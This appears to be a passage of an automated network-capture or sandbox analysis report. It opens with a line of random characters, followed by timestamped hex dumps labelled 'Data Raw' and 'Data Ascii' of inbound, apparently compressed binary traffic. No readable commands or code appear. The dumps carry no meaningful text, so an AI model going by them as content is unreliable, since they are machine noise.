hTzDm+lAW&3e;I'l_:8x0bB-x5uVuixF^t;RVFwZ(2QV)Ku~\|=}J(X?WCT\|zLC`a/ika9ly1yb[~iHl,j
2023-11-18 09:02:40 UTC	3424	IN	Data Raw: 0f 5f e9 a7 c5 fa 58 ff fd 7b fd 04 1e 5e bf e0 40 40 49 b7 bb 9d 57 53 83 ae 83 ba f5 cf 8b bd 75 bb 79 9a 0d 46 3f 7e dc fe db 8e fa ab ea 4f 26 98 8b 3c 27 c5 5c 8f f6 91 ac 56 92 ac b6 24 81 ff 4f 4a 24 91 f7 48 31 af 39 0e f3 24 c1 dc 0d 30 07 46 30 91 5b 34 47 e2 e7 3b d5 30 27 a5 a0 c7 1f 8e be 6d 84 11 bd 5a 40 7f 86 d0 7f 1c a6 a0 3f 32 02 46 e4 83 f0 bb 78 24 da 51 31 75 59 50 9a 75 10 cf f4 cc aa d4 fb 3f 27 76 a9 41 47 41 9f ab 5e bf 77 7b 63 2f dd de 2d 5f 18 41 26 a5 a0 be ae 0a 3a d5 e8 d7 aa f5 fa f9 cc cb 0f 50 25 41 80 e6 ac f6 43 00 f3 c5 93 69 a7 f1 cf e1 46 01 9c 22 01 d4 92 00 36 91 00 ae 26 2a 02 78 78 78 a4 d6 fe b0 00 d3 2c c0 6c 26 98 77 00 26 61 78 a4 d6 9e 20 c0 5c 16 60 b6 10 cc 43 00 53 97 0c d5 11 60 4d a3 1e 47 1c 66 2f b4 Data Ascii: _X{^@@IWSuyF?~O&<'\V$OJ$H19$0F0[4G;0'mZ@?2Fx$Q1uYPu?'vAGA^w{c/-_A&:P%ACiF"6&*xxx,l&w&ax \`CS`MGf/
2023-11-18 09:02:40 UTC	3440	IN	Data Raw: 0d 12 25 ea c7 76 13 7e 05 52 a2 2d 9d 05 00 42 a9 8d af 24 74 f9 b9 b8 80 2a 3a 81 52 d8 d9 af ff 12 54 a5 42 65 2d 64 45 91 13 83 33 1e 06 76 96 f0 a2 ca fa 7a 4f 1c 68 b1 3e 4b 83 f7 01 18 b6 2a f1 0e 0c c1 1e 49 85 8b 24 45 74 62 f6 8e d2 33 3b 5f f1 42 62 cc 6a 76 d0 1b 9e 71 0d ba 60 66 e5 74 3f ca 8a 52 2d 74 e2 8d 5b 5c 6d a8 00 1a d4 7b 6a 0b ec 99 fd 63 11 7a b3 29 b5 e7 75 4d 1a ca e6 b7 dd 5d ab 20 d5 9a 2a 25 5e ab 4a a0 64 1c af cf ca 75 12 1c 2b 13 22 8a 1a 9c 8c 7d 5b 25 95 3a 18 dd 56 0a a5 aa 2b f3 dd 24 bc b4 a1 ff c9 0b 9e 69 6f b6 52 bb 48 06 11 a7 85 a4 ec 19 15 be 89 32 68 98 91 02 05 39 ab 82 61 8f 4e 96 3e ea c2 54 33 ac 67 f5 1a c2 5d 85 4c ed 2d 1f ed cd 52 7d 5e 8c bd 36 dd 4e 90 26 0e cc a1 46 da 74 7f f9 97 69 ec 62 ab 80 20 Data Ascii: %v~R-B$t:RTBe-dE3vzOh>KI$Etb3;_Bbjvq`ft?R-t[\m{jcz)uM] *%^Jdu+"}[%:V+$ioRH2h9aN>T3g]L-R}^6N&Ftib
2023-11-18 09:02:40 UTC	3456	IN	Data Raw: 51 d3 34 14 c0 b1 14 4f 79 96 69 7e 93 49 93 50 62 9d 57 85 df 48 f7 55 b2 e3 28 fb 10 17 1c 99 7e ea 2b 8d 79 e1 49 36 7f 14 fa e8 e0 25 55 4c 0c 10 9d 35 15 72 6b f4 6d 29 f3 66 e8 fb e8 43 c1 84 2d 90 1a 70 17 95 1f b9 a7 ea b7 e4 46 f0 fa ba 68 49 23 35 c4 da 0c e6 e5 c4 82 f3 7f a1 62 91 06 8d 68 9e e6 ef 36 d7 ce 7a 29 d8 76 2c 4a 6e d7 6f 69 0e f8 8b 31 fb 47 66 42 ff 76 5e 1f fd 6c 49 2e 78 c3 84 34 43 a8 42 b8 6e f0 77 4d 12 1d b8 22 86 b6 d3 39 c3 00 27 d5 a9 98 ba f2 39 83 64 4e 75 8a 99 4c 9b f0 58 0f d2 11 84 72 36 16 b8 d0 0d d0 a1 25 50 45 37 b6 ee e5 24 94 da c8 43 19 9a 67 c6 68 fe 21 5b 99 cc 35 ce 71 83 4a 8c 6e 2b d0 dd b8 ee 7b ab 8a 82 e2 fd 2b ef d3 b8 6a 83 f8 ee 9b 08 18 dc 09 8f ef 58 e8 77 1f 94 02 dc 41 22 00 2d 25 fb 3e 88 72 Data Ascii: Q4Oyi~IPbWHU(~+yI6%UL5rkm)fC-pFhI#5bh6z)v,Jnoi1GfBv^lI.x4CBnwM"9'9dNuLXr6%PE7$Cgh![5qJn+{+jXwA"-%>r
2023-11-18 09:02:40 UTC	3472	IN	Data Raw: ac a5 a9 b3 bc b9 11 83 07 d0 d3 8d 7b 89 33 5e 3f a3 8d 5c 2e d0 47 fd 8e 91 b1 a9 67 b8 9b bb 97 81 bc 72 86 f4 bc a7 23 dc a8 03 e4 d3 e3 1d c8 f3 c0 5f b9 4f ef 7c 49 4e ff b6 98 6b b3 ed 00 fd cd 67 24 1d 7b f5 47 5a ba 69 08 39 23 ce 22 b5 ba 75 24 6b 26 f5 a5 ef 7f d6 98 f4 9f 31 8e 98 56 cd e4 66 fd d1 9b 66 c7 5d e5 9e 65 46 90 36 63 73 b9 fd 6b 67 50 f5 d4 5c 3a af 3c 9f fe 72 ae 16 f1 fb 62 3b 19 b8 bb 13 7d 32 2b 94 3e 0a d9 2c 7e bb ba 8c 6c 30 dd 25 fa 56 5e f4 d7 1d 0b c8 dc ae 97 49 dc 1d 3b d1 ff ad e7 64 e6 ed 17 f4 d7 19 a7 69 d8 e6 fe dc 3b 6d 5c 49 f9 a0 1c f1 e1 b1 7e 74 73 59 5d 72 ef 77 05 cd f7 7e 4c a2 6e 2f a2 e3 47 af 16 c5 05 11 64 e0 93 62 51 33 3a 96 34 cc fe 8c fe d6 a5 82 dc fd b0 98 0b 8a 2d a1 67 06 f7 e0 9c ea 38 d3 cd Data Ascii: {3^?\.Ggr#_O\|INkg${GZi9#"u$k&1Vff]eF6cskgP\:<rb;}2+>,~l0%V^I;di;m\I~tsY]rw~Ln/GdbQ3:4-g8
2023-11-18 09:02:40 UTC	3488	IN	Data Raw: 83 fe 17 de 73 4b cf a8 61 77 a3 1a 50 31 72 16 3c 1a 5f 9b d9 da 64 27 6c 1b 3b 85 ab 1f de 0f e7 1d 9b 84 6b a6 ed 86 e1 0f 8f 71 0b 36 8d 80 79 7d bf 72 8f d9 06 10 76 aa 01 94 2b e3 06 9d 2c 5d 18 ae e3 47 f4 5c 11 0e 47 53 f2 e0 8e 64 5f 06 63 86 63 a3 e8 d2 d0 f0 6e 16 60 9f a6 32 1b 3d 66 40 a3 a1 f7 b9 a3 58 19 3c a6 67 83 19 f5 22 b0 e2 a6 de 90 fa cf 54 2c 7d fc 02 e3 b1 92 a7 89 66 4f c4 a4 81 45 a1 51 b7 c3 f8 36 7e 27 30 7f 4f e0 94 6d ed 90 f3 e4 5d d8 6d fc 8e 49 fd 8b 72 43 5b f9 e1 08 1e 3f 5f ae 58 1c 07 15 3c 8d a9 53 96 83 a5 48 09 66 71 8b f2 d8 fd 55 4f 78 b4 fe 0b 84 19 37 70 67 97 a7 c0 4d c3 42 3c 15 f5 18 7f bf 7f 87 3b 13 d7 12 a3 c2 72 c0 a0 ad 5a 58 5e 76 3e 16 9a df 0d 6b 15 cb c3 68 0f 6f c4 7e 21 8b 99 45 43 8f 43 e2 92 a5 Data Ascii: sKawP1r<_d'l;kq6y}rv+,]G\GSd_ccn`2=f@X<g"T,}fOEQ6~'0Om]mIrC[?_X<SHfqUOx7pgMB<;rZX^v>kho~!ECC
2023-11-18 09:02:40 UTC	3504	IN	Data Raw: e8 93 c5 ab 6b d8 04 22 d0 14 23 24 6c 24 5c a3 a7 96 e5 e4 db e7 78 fe 71 16 27 68 80 fb 7f 35 80 0a ab 1b c0 6e f1 3b 76 4d 03 18 b8 ae 01 cf 3c 98 a8 94 ab 9a 15 9a 11 c5 84 78 b5 45 70 27 c1 37 89 2a 78 c9 7a 24 3c aa 21 34 54 5b 9c 43 e3 a2 b8 e1 66 cd 58 a1 43 0c cf 30 83 82 7c 1a 84 37 8a 88 64 85 67 b9 ef 4c da cb b5 a9 af c6 38 5d 82 de 48 f7 69 21 59 78 64 18 0b 19 a4 4d 72 1d 21 9d b8 b9 4b 8d 34 0a 97 24 65 98 4f b0 62 d1 d2 3c 36 aa 96 e1 e4 15 84 49 9e b6 10 51 44 64 b2 48 c5 d1 0b 02 49 e7 c4 e9 e9 e5 05 99 b4 45 6d d5 05 fa 2b 74 46 e2 80 83 3a 55 52 43 74 4c 08 4b 65 ec a1 2c 71 8e 9a e1 2c 54 a6 ad 8f 3c 8a 02 88 8e 68 1d 12 1b 9e 0e 82 73 1a a4 07 21 8f 73 cc 52 f1 86 23 42 0a 3b 76 47 87 a0 8a 6c c3 82 f1 ba a0 68 1e 47 a4 32 54 a6 48 Data Ascii: k"#$l$\xq'h5n;vM<xEp'7*xz$<!4T[CfXC0\|7dgL8]Hi!YxdMr!K4$eOb<6IQDdHIEm+tF:URCtLKe,q,T<hs!sR#B;vGlhG2TH
2023-11-18 09:02:40 UTC	3520	IN	Data Raw: 2c 80 ef ce fa f3 c7 3a f4 e4 08 ee 4b 38 1e f9 de 78 f9 c1 c5 bd 28 af 35 de 48 5e 6b 7c c0 47 e5 f7 45 84 d1 9e 1a 93 6a 6f 52 eb d7 cf 1a d0 67 5a 5c 5d ee d1 75 a4 3e 0e 7a fd f5 ad 8a eb 9a 8e 5a 8a a1 89 f1 a6 52 cb 3e 5e ff ae 8e be dd 52 ba aa 64 19 e4 c3 66 c8 ec 1b e2 e7 ff be ea 1e fe e9 ff fe cf c3 3f f9 6a 69 bc df af ff c6 fc fa fa 01 7e fe 9d cb ff 03 a7 27 5f 2f 19 9f 7e 17 28 40 10 74 ef 34 52 eb 0a 25 b4 41 99 aa b8 73 45 7c cf 3c c8 ec ae 2b a7 41 ac d6 af 6b b0 1e af b2 ac 0b a2 05 08 30 3f 03 0f eb 46 a7 2a 68 ad d1 57 59 29 35 98 1f 25 13 72 b3 34 2c df a1 0a 4d cf 6b b3 b9 9a ce 2f d3 72 98 92 1e fd 0f 69 b6 b5 8e 69 7b ee ed c5 5f 67 8e 6a f9 67 9d f9 a8 1f f0 f9 34 fc 29 4d 56 21 d1 4d 38 b1 61 e6 bc 2f 66 f0 f4 c7 62 59 a2 8e 0e Data Ascii: ,:K8x(5H^k\|GEjoRgZ\]u>zZR>^Rdf?ji~'_/~(@t4R%AsE\|<+Ak0?F*hWY)5%r4,Mk/rii{_gjg4)MV!M8a/fbY
2023-11-18 09:02:40 UTC	3536	IN	Data Raw: ae 37 92 06 ca 11 c4 b2 0e ac 5b 56 af 52 bf 1c 37 ee 04 9c 5a be 65 2e ca 1d c3 f8 79 f0 57 30 40 53 8b c5 c2 30 9e c6 e8 0a 93 9b b0 d9 28 50 70 c5 21 0b 76 39 31 7d 0d 53 22 1e 5a 51 17 01 25 7e 4b fa 02 d8 b5 7a 69 0c a1 62 8f 65 e9 b9 b0 68 5e 99 f2 0e e7 c5 0a 6a 94 a1 96 fa c9 2f 7c 53 1d 9f e8 d5 5c ae af 59 ae 94 cf dd 0e 15 2e 58 f3 2f 9c 0b 06 eb 9c 54 75 b9 87 de 0f d6 27 ad d7 65 3b a1 e0 1b 9a 3b 8d e6 d1 3c 9f 85 7a fd 18 36 54 36 5b ec e3 9f 03 35 5b 34 8f 3c 49 9b be 8b b3 64 47 d5 eb eb a2 fc 92 88 a3 40 85 80 16 67 88 f1 12 b8 c1 dd 5e 37 3c e9 be 78 f9 bc dd 6b 9f ea 44 ea 05 53 25 8b ad f4 b3 01 5b c3 9e 48 e5 b7 d6 a4 03 ef db 48 49 69 71 7e a9 0f fc 77 20 ae b8 03 cc 2e e9 0b 2c 56 ec 40 09 bf 66 5e 49 93 98 a0 05 1a 3b 65 7a 77 3c Data Ascii: 7[VR7Ze.yW0@S0(Pp!v91}S"ZQ%~Kzibeh^j/\|S\Y.X/Tu'e;;<z6T6[5[4<IdG@g^7<xkDS%[HHIiq~w .,V@f^I;ezw<
2023-11-18 09:02:40 UTC	3552	IN	Data Raw: 85 a6 ec 5a 63 6c 5d 39 fe 96 81 b7 de c4 d6 0f c3 ac 02 c7 59 27 a1 11 d3 65 42 2c 61 88 c9 5e e2 25 1f 15 a8 cb d5 3f 20 c6 1a 1e 75 b3 2c 6a 78 a6 c3 a5 50 2a ea 1a 46 ee 00 09 7c 44 45 30 1e e0 72 50 6f f6 3a 06 12 e2 db 88 75 06 c4 e9 6b 3b 2e a0 da 1c 5f ae 54 6a 5d e3 21 1d d9 64 a3 72 c4 5e f9 a8 d1 33 1e 6a 19 49 2d 86 22 b3 bd 57 6e 50 be 3d 0f f9 33 dc 2b be 3d 27 46 39 06 39 dc ab 37 6a 04 82 b2 2a ac 2b 14 b9 b0 3c df f2 b1 b3 22 57 73 c1 73 82 e3 d6 51 a3 ba db 80 d5 14 53 b5 a6 4a c1 2c 9c 07 f0 c0 35 f5 bd d3 b8 7a f5 66 bb d3 da ef d4 ba 58 f9 18 56 31 dc cd c0 97 1b 9d 5a b9 7a 9f eb d3 65 84 db d3 c9 a8 14 57 e2 e1 0f 78 19 ed 75 65 4d 50 b7 70 10 8e 5c 59 82 6c 24 ad 7c 97 c0 ab b5 6e af 5c ad 76 3a b5 d7 8c 87 9a 57 5c d9 44 96 0d d2 Data Ascii: Zcl]9Y'eB,a^%? u,jxPF\|DE0rPo:uk;._Tj]!dr^3jI-"WnP=3+='F997j+<"WssQSJ,5zfXV1ZzeWxueMPp\Yl$\|n\v:W\D
2023-11-18 09:02:40 UTC	3568	IN	Data Raw: 5a 8b d6 b3 f7 59 db aa b6 22 a9 a9 c3 6c 0b e2 b2 cc 7c 88 0b 93 cb e0 8f 68 af 89 6b cc 0e 67 10 db b8 22 f3 dc 2c 52 d6 a2 e6 ea 82 25 e4 ba 73 5f 4d de 51 1a 83 2d d2 19 ce b1 c6 37 4b 83 77 9d cb bf 1e de ff be ab f0 88 99 97 5a d6 7e f9 c8 b2 46 1b 5e 09 f3 60 19 cd c3 d5 e8 9c 23 49 8f 72 dd e3 1f d2 dd 99 a9 b1 d7 73 54 d2 42 a8 2f 77 9c 6a a1 db aa bf 53 f7 de 55 ee 33 0b 51 bd fc 95 4c f2 cf 6e b1 fd c9 8e c7 be 4e 3c d4 32 d8 6f f3 fe e1 bb 29 a4 e5 42 43 fc eb 5b c3 fc 0d 0b 9d 51 9d cd 66 34 33 d3 be f1 f2 3e 4e e3 15 34 4b 0c 6a b2 52 e7 95 6f f3 b6 29 dd 70 ad 1e 81 07 e8 b8 8e b0 45 d1 3a 4b 7f 8e 29 4d 63 88 ec f1 7f 78 ec 42 53 32 39 97 a1 b6 ae bf af 18 fa 02 27 ad 9d 2b 65 5e e7 5d 62 e0 65 76 eb 8b b6 99 b7 34 6f 8d a3 22 b3 5f 5d 98 Data Ascii: ZY"l\|hkg",R%s_MQ-7KwZ~F^`#IrsTB/wjSU3QLnN<2o)BC[Qf43>N4KjRo)pE:K)McxBS29'+e^]bev4o"_]
2023-11-18 09:02:40 UTC	3584	IN	Data Raw: 40 5d 86 62 d0 ba ea 21 f4 bb 7f 17 f8 20 a7 1f e8 d8 26 05 24 06 bd 81 d5 63 fc e0 2d 82 4d a8 71 2e 04 2c 6d 10 03 de 7d 3d 02 c2 13 e0 10 66 6b 69 f0 56 6e 1f 18 f8 28 17 38 5d 70 05 a4 66 38 0d 58 19 f5 80 17 a8 69 c1 47 cd 49 40 b8 6b 20 c0 f1 24 04 c2 23 bd 00 5a 9a 55 42 6e 90 dc 04 8f 92 18 41 6a b2 3d c1 7a af 15 08 27 b5 24 90 10 ca 02 d8 5f ee 07 3b b7 ea a1 23 b0 07 a0 cc 41 5b c8 8b c5 57 00 34 9c 17 7a e9 1c 3b 98 51 c5 0e 42 9c 2d 01 9e de 9b 40 3b 63 02 e0 53 e8 06 bd 5a 6a 02 80 ea 21 40 6f 17 0b e0 8f b8 00 4e 5d 1f 06 b9 a5 e7 20 f5 82 55 e0 c4 c0 5b c8 65 f3 0f 60 ff fe 04 f0 4b f3 01 60 21 ca 06 90 e8 98 04 2c 72 93 a1 d5 71 2b 40 3a 74 04 f4 7f 01 01 de c7 12 01 a9 3a 14 e0 f5 92 cf e0 ed cb 4b 80 26 2f 07 b4 da 68 08 28 fc ce 0d f5 Data Ascii: @]b! &$c-Mq.,m}=fkiVn(8]pf8XiGI@k $#ZUBnAj=z'$_;#A[W4z;QB-@;cSZj!@oN] U[e`K`!,rq+@:t:K&/h(
2023-11-18 09:02:40 UTC	3600	IN	Data Raw: 92 ae 81 06 d3 08 f6 63 59 89 0e 59 bb f3 4a a6 0b a7 86 4e 2c 21 73 49 e6 7c c6 4d cc 76 63 35 67 5d aa 98 46 94 5d 24 35 f0 00 d2 5a 4d 1e 07 8a dc 58 c9 2d e6 65 0a 1d 78 72 84 77 f4 92 88 5e 1b dd c2 dc fd e2 7b 3f 53 bf f5 1b f5 e7 6f 1b bf 77 1a bf bb f2 f0 7b 97 3d 92 89 ab 06 87 f5 05 79 dd a8 db ee 07 b8 32 89 9a 8a c1 14 8c 48 09 15 9d e3 18 f8 f9 55 5e e1 89 29 25 21 45 3d 43 5b 3c 3d ce 33 b0 38 86 03 5a 0a ea 5a 4c 50 a7 85 70 45 40 36 b9 6c a6 05 7b 4c 8c b1 8e 52 43 f0 a6 4f 91 ba 81 7f a0 88 c7 e5 3c 1d 31 20 32 32 4c a0 7c 37 49 34 e7 a7 bb 88 ad aa af fb 8d 07 fa 6d 1a 9b ba 79 bb 46 f1 0f a6 eb e4 58 5f 73 52 b4 e9 59 88 60 fd 75 d2 fb d3 6c 4e c2 1b 26 b0 1b 40 14 bb 75 ce f5 81 f9 9a b7 0b 30 cb 63 b5 36 fb ec b9 e7 32 f1 86 e6 6d 2b Data Ascii: cYYJN,!sI\|Mvc5g]F]$5ZMX-exrw^{?Sow{=y2HU^)%!E=C[<=38ZZLPpE@6l{LRCO<1 22L\|7I4myFX_sRY`ulN&@u0c62m+
2023-11-18 09:02:40 UTC	3616	IN	Data Raw: b8 df 05 f3 fd cb bd 70 6e 9d 19 fa 64 df ca 90 0f 67 61 ff 70 62 6f e0 4b 61 7f b2 7b 55 e0 8b 81 3f 03 f2 83 c0 5f 84 71 fb e0 bc 30 ad e1 bc fc 33 f0 e7 02 f0 db 2f c0 6f c8 df ad e1 fe 32 6d 5f f0 c3 61 18 e3 e3 c0 8f 00 ff 02 f0 a3 c0 33 e0 8f 00 ff f2 be 7a fb d7 ec 0b e7 a3 c3 94 60 7b f6 f5 e6 bb 6f 5f 38 47 1f 05 fe c7 c0 1f 03 fe 04 f0 c7 81 ff 3d e8 7f 12 f8 bf 36 d8 f3 9f 0d fc bd 7d a1 1f 9e 80 75 e7 b2 fd f5 f2 bf bd 3f 8c 7b 12 c6 fd e2 fe 60 e7 29 e0 7f 00 fc 34 f0 15 a0 e7 79 e0 bb 41 fe 0c f0 6f ee 0f 7d e3 15 c8 cf e3 c0 cf 00 ff db fd 61 7d b9 ad 77 e9 dd 97 d8 0f f7 e5 66 84 fc 7f 71 7f e8 03 6f d1 8b 73 fb 7b 7a de 06 fe 0e f0 4b 47 61 1f 4b 2f ae 1c ed f1 cf 01 6f cd 0c dc 02 7f 97 5e fc 7e c5 6f 1b ad f7 f3 40 03 df d0 c0 6f 5a 5d Data Ascii: pndgapboKa{U?_q03/o2m_a3z`{o_8G=6}u?{`)4yAo}a}wfqos{zKGaK/o^~o@oZ]
2023-11-18 09:02:40 UTC	3632	IN	Data Raw: c0 1e df aa ee 25 49 b2 b1 16 d5 ee e7 5d be f8 48 fb f4 c5 97 cf 9f 7f 2e 39 cb 6c bd 89 db 70 9b 8a ea 46 6c dc 9e b7 ad bb d3 24 0b 96 50 48 9b 27 8d 97 40 f1 64 d1 0b 47 d4 a3 5e 5e 2d bd 44 fa f4 78 73 23 8d 8e 93 fb ef 0e 12 b4 3f ea d2 de 1f 7c a6 27 5f a4 93 67 5f 7c 91 a5 cf a2 37 99 76 ba 97 e9 ab 49 f2 6f be ef 1f 7d da 65 a7 a9 fe c4 87 f5 45 71 dd ca 02 c9 5b a0 17 8a fa 7f 5e de 62 c5 2e b6 ca 2c ef 9c 26 14 6b 07 75 48 11 b0 7a 2f b6 b4 d0 4f db 0d 5c 8a a0 da 70 ed a3 d1 a3 bd 56 86 6d 28 5f ee 58 7f 38 e8 ac f3 d6 94 4c 98 da 0d 89 4f b5 6b 63 a4 dd 5e 56 d5 75 fd 84 aa e0 a2 da 88 ac 94 30 1c f4 56 5d 43 70 68 1f 6b d3 42 1d 02 70 55 5c ab 30 1f 43 ce 95 fe b1 f6 31 3a a2 62 10 a5 c9 98 1c b4 f1 6c ca 00 f9 e3 c5 a8 1c e9 8f 3e 1e 3d 3a Data Ascii: %I]H.9lpFl$PH'@dG^^-Dxs#?\|'_g_\|7vIo}eEq[^b.,&kuHz/O\pVm(_X8LOkc^Vu0V]CphkBpU\0C1:bl>=:
2023-11-18 09:02:40 UTC	3648	IN	Data Raw: 87 ee ff 42 d7 32 3d ff 17 dd df f8 da b9 2a d1 f3 2f d2 fd 3d ba ee d0 f3 b7 e9 1e d0 f5 94 9e 7f 9b ee df a7 6b 87 9e ff 86 ee ff 48 d7 2e 1a f3 f5 73 f5 75 ba 70 c2 df a2 7b 87 ae 26 3d ff 26 dd bf 4f d7 1e 3d ff 90 ee 7f 4b d7 3e 3d ff 88 ee ff 43 d7 c7 f4 fc 4b 3f 7b ae 56 e9 fa 15 7a ee d2 3d a6 0b ca da 7f 4e f7 1f d2 85 f3 d0 3f d1 fd 5f e9 d2 3e 2a d5 a3 30 8c 01 46 cb f6 a3 4b 83 a5 25 d6 50 91 7d f2 51 b3 d9 69 77 5a 95 3d cf 68 6d 01 26 a9 53 79 c2 07 84 fd dd dd 4a eb e3 07 df 5c 8a be a9 1a 4d a2 e6 6b 48 84 74 6c 54 17 cc 3f 2f f6 4c b9 e5 be 51 29 7b 08 ad 12 fb 5e 2f 7d 09 6a ea 72 12 34 a6 2d 39 58 f5 de 89 fd 43 fa 3f 9a d2 d9 7f 72 c1 7c a1 35 76 88 a7 3e 32 2e 88 e1 49 9a e6 fa 89 67 13 8f f9 d0 d0 8e a7 80 fa 8b d3 4d 66 50 bc fb e2 Data Ascii: B2=/=kH.sup{&=&O=K>=CK?{Vz=N?_>0FK%P}QiwZ=hm&SyJ\MkHtlT?/LQ){^/}jr4-9XC?r\|5v>2.IgMfP
2023-11-18 09:02:40 UTC	3664	IN	Data Raw: 9f cc ea 64 4f 75 67 cf 63 11 d1 cc 52 36 4f 52 97 b3 de e7 75 1e 1e b0 1d c3 ae fa f1 60 69 1b cf 40 26 d8 7d f6 cd b3 6f f7 5f 3c fb 46 a9 b5 0e d6 57 13 9e 6b 13 9e 64 13 9e 72 93 05 7d c5 13 9e 95 93 8e 39 9a c8 c4 e5 94 b3 49 c7 c4 9d 71 dc 82 e3 3a e7 fd 02 49 9e 98 f5 ba 58 ae 2a 7f 06 68 5b 41 59 5e 34 3e 66 b0 1e b5 76 d5 59 5a b6 74 76 ea 82 51 20 cb af 41 9c cd 29 93 ac ac 37 1f 3c d8 c6 09 9d fe e6 ed d1 87 70 34 06 e7 d4 0a 3c 3b 3d be 78 47 7a 92 4a 5c 44 f8 10 35 87 0c dc 52 25 4d f1 67 47 42 f8 b6 38 26 2b ab 29 f7 48 c3 18 8b 44 90 19 03 18 97 98 ce 76 8f 6c 36 95 0d 33 79 97 01 c9 15 df aa ac fe d7 80 ce 81 94 70 55 26 5e 5e 97 cb aa 4b 9d 0a 94 82 6c 5f 81 d6 67 d1 bd e9 9f 53 db 57 22 e4 dc 52 b7 9b f6 55 f0 3c 21 73 44 7f d6 3d 0f 7e Data Ascii: dOugcR6ORu`i@&}o_<FWkdr}9Iq:IX*h[AY^4>fvYZtvQ A)7<p4<;=xGzJ\D5R%MgGB8&+)HDvl63ypU&^^Kl_gSW"RU<!sD=~
2023-11-18 09:02:40 UTC	3680	IN	Data Raw: 6f ef 0c 7f 0f f3 a1 bb cc 00 be 7c fe c2 ab cd af 4b 2f 2e 0f 45 02 9f ae ba 00 d7 a9 6f ae 7c 7b 22 ac a8 d7 c4 fd b2 e7 85 c3 dc 4e e6 95 e9 2c e3 bf 18 bd f7 77 b2 7d 4c a8 b5 f2 f3 28 0a e1 80 56 8f 2f 7f f5 4a 14 0b 89 f1 ba fe fc 84 d7 d5 dd f3 83 2b ec 4e f9 85 cb 7b 0d fa fa fb ab 4f c8 22 ac 2c 48 b3 b8 57 f9 a6 65 a9 d2 f2 4f f3 4f fd 88 17 e9 ac 79 a9 06 6a d0 d8 35 de 17 5f bc 88 30 0d aa d6 de 6a b7 3b 9d 4e bb bb f9 74 ab bb a5 6f b2 27 4f 3a 5b ad b6 4e de 6c 3d dd da d9 d9 ea a2 c4 a6 ce 69 77 b6 9f 76 5b 9b ed 9d ad 27 9d d6 76 6b 73 bb dd ee 76 76 ba 4f 37 9f ee 6c 3e 79 b2 dd e9 b4 3a 8f a3 cd ed 6e 7b 7b a7 bb b5 ad 93 3b db 9b 4f 76 da fa 2f 2a d5 6a 75 37 9f 6c b5 75 fe 66 bb db 7a f2 f4 69 77 67 7b bb b3 a5 eb 6d 6d b7 b7 9e ec 74 Data Ascii: o\|K/.Eo\|{"N,w}L(V/J+N{O",HWeOOyj5_0j;Nto'O:[Nl=iwv['vksvvO7l>y:n{{;Ov/*ju7lufziwg{mmt
2023-11-18 09:02:40 UTC	3696	IN	Data Raw: 44 8d 9f 56 84 65 47 6b f5 c7 c6 f7 4a 0b b6 39 3e 0c ad 75 9a 18 e8 d9 f4 cc 43 05 04 94 ef 22 31 85 18 e8 59 41 15 63 56 5b 86 32 64 3a e2 c8 b3 e2 bf ed ad 3c 2f ac bc b5 b6 72 ef eb 46 7e 05 4f 61 21 18 05 85 72 e2 dc da a7 89 9f 98 a1 89 94 34 9e d6 a5 22 e2 b1 f8 4c 0b 12 b2 44 95 fa 73 c4 4c a9 77 83 53 1e 73 8c 2f 50 0a dd fe a0 cb 48 d3 ad 84 a7 2b e8 27 7c 99 85 a5 b4 c5 10 bf 0f 45 76 71 67 49 a6 86 c8 3d 1d 79 db 8e 43 27 45 86 66 9d e3 02 06 b4 53 42 7b 50 66 7f 4b 58 16 bb 62 28 5b 46 91 09 f7 8c 12 31 8f 3f 5d 6b 8d b9 14 e2 c7 99 dd a3 3f d0 71 e3 e1 ca 5d 57 9d af 2b f1 62 c7 84 6b ea c4 ce 39 5f 27 4b 6a b0 1d f2 61 42 b7 11 37 fb 6d 4f 0e 5c 23 46 e2 c3 10 a3 a5 e6 02 c4 f6 3c a2 39 5c 44 10 2d bb 6a 5d 9d e3 99 fd cc 72 36 ae 57 ce c6 Data Ascii: DVeGkJ9>uC"1YAcV[2d:</rF~Oa!r4"LDsLwSs/PH+'\|EvqgI=yC'EfSB{PfKXb([F1?]k?q]W+bk9_'KjaB7mO\#F<9\D-j]r6W
2023-11-18 09:02:40 UTC	3712	IN	Data Raw: 4f 1b 39 15 8e 69 8f 7b 84 bb 58 21 a7 b0 c7 cf f2 7e 38 ae 83 fc 12 5e 69 8d b3 c3 bf 76 43 cd f0 c8 1e f2 0a 78 47 1f f9 22 3c c8 5e 9e 01 1b 0c 44 5e e0 01 f0 1c f8 b6 83 5c 0c af 1c 24 87 c3 67 06 cb 8f e1 23 43 e5 87 b0 d1 28 b9 1d 1c 03 a7 c0 ff 8d 96 6f c2 96 e3 b0 d3 e0 b1 b0 3b 1c 05 3f 86 4f 38 ca 0f e0 c6 ce 72 37 38 78 bc 1c 0b df 84 9f c0 86 13 64 0b 78 08 3c 15 de 04 47 c3 9f e1 26 13 e5 71 f0 02 b8 b7 8b 3c 09 ae e5 8a 7c c1 f6 93 e4 89 f0 f5 c9 f2 53 d8 74 aa dc 16 1e 06 2f 80 2b fc 89 9c c2 bb e0 38 b8 04 36 71 93 ff 85 f7 c0 f1 70 0a fc 15 36 9d 26 9f 85 ef c2 ef e0 2a d3 51 33 6c 07 3b c1 ee f0 51 38 03 0e 9c 89 ec c0 95 67 cb 2d e1 01 ee f2 78 78 f5 3c 39 12 ae b1 10 f7 0b df 85 bf c0 be 7f c9 39 f0 39 0f f9 1e ec b5 44 0e 82 1f 7a 22 Data Ascii: O9i{X!~8^ivCxG"<^D^\$g#C(o;?O8r78xdx<G&q<\|St/+86qp6&*Q3l;Q8g-xx<999Dz"
2023-11-18 09:02:40 UTC	3728	IN	Data Raw: 77 f0 a8 6c d4 01 6e 96 8f bd 80 4b bf 91 cd e1 49 f0 46 f8 22 fc 11 b6 7f 8b 3b c0 65 de 61 07 e1 f5 ef e5 c3 70 cf 42 79 3c ec f8 49 9e 07 3b 14 e3 ef 70 44 89 9c 0e 77 fc 21 8f 83 73 60 c3 9f f2 ca 52 75 95 4b f0 eb d2 72 b9 32 72 2b d8 15 3e 66 20 5f 87 c3 ca ca f1 f0 92 72 72 38 7c c8 58 3e 0f 7f 86 6d aa c9 d9 d5 e5 2a bf c8 49 35 e4 fb 70 b6 89 5c de 54 76 80 c7 c3 35 6a c9 5d e0 8d 75 e4 23 f0 17 33 b9 b6 b9 5c 02 9b d7 c5 db e1 34 d8 db 02 67 e0 49 96 f2 26 38 1f ae 6d 25 9b 5a e3 8d b0 59 03 b9 27 9c d2 10 75 83 4f 36 91 ef c2 55 9a ca 4d 60 57 d8 1b de 01 27 c0 0f e0 8f 70 fd 66 b2 1d 3c a1 b9 bc 10 76 68 21 8f 80 7f 